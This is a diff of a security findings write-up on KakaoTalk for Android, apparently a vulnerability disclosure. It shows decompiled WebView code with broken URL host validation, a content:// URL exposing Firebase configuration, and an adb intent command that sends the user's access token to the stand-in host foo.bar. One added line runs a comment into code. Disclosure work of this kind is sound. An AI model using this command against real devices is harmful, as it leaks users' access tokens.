stulle123/kakaotalk_analysis/FINDINGS.md

     this.f192507q.setWebViewClient(new C8206a());
     this.f192507q.setWebChromeClient(new C8207b(this.f192508r));
     this.f192507q.setDownloadListener(new C34313v1(this, 0));

     if (str2 != null) {
         setTitle(str2);
     }

     if (str == null) {
         str = C24983v.m36731j(C47684e.f174774b, "android/adid/manage.html");
     }

     WebView webView = this.f192507q;
     HashMap m16559U5 = m16559U5();

-    if (C55281p.m61314a0(C47684e.f174709D0, Uri.parse(str).getHost(), true)) {
+    // URL host validation is broken.
+In fact, any URL can be loaded. if (C55281p.m61314a0(C47684e.f174709D0, Uri.parse(str).getHost(), true)) {
         m16559U5.putAll(companion.getInstance().getBreweryHeader());
     }

     C52084x c52084x = C52084x.f192756a;

+    // Finally, the URL is loaded.
     webView.loadUrl(str, m16559U5);
 }
 ```

-This included `javascript://` and `data://` schemes which allow to run Javascript.
+This included `javascript://` and `data://` schemes which allow to run JavaScript.
 Also, it supported `content://` URLs, so a URL such as `content://com.kakao.talk.FileProvider/onepass/PersistedInstallation.W0RFRkFVTFRd+MTo1NTIzNjczMDMxMzc6YW5kcm9pZDpiNjUwZmVmOGI2MDY1MzVm.json` opens KakaoTalk's Firebase Installation configuration in the `MyProfileSettingsActivity` WebView.

 Last but not least, it leaked an access token in the `Authorization` HTTP header.
 For example, a command such as `adb shell am start "intent:#Intent\;component=com.kakao.talk/.activity.setting.MyProfileSettingsActivity\;S.EXTRA_URL=https://foo.bar\;end"` would send the token to `https://foo.bar`.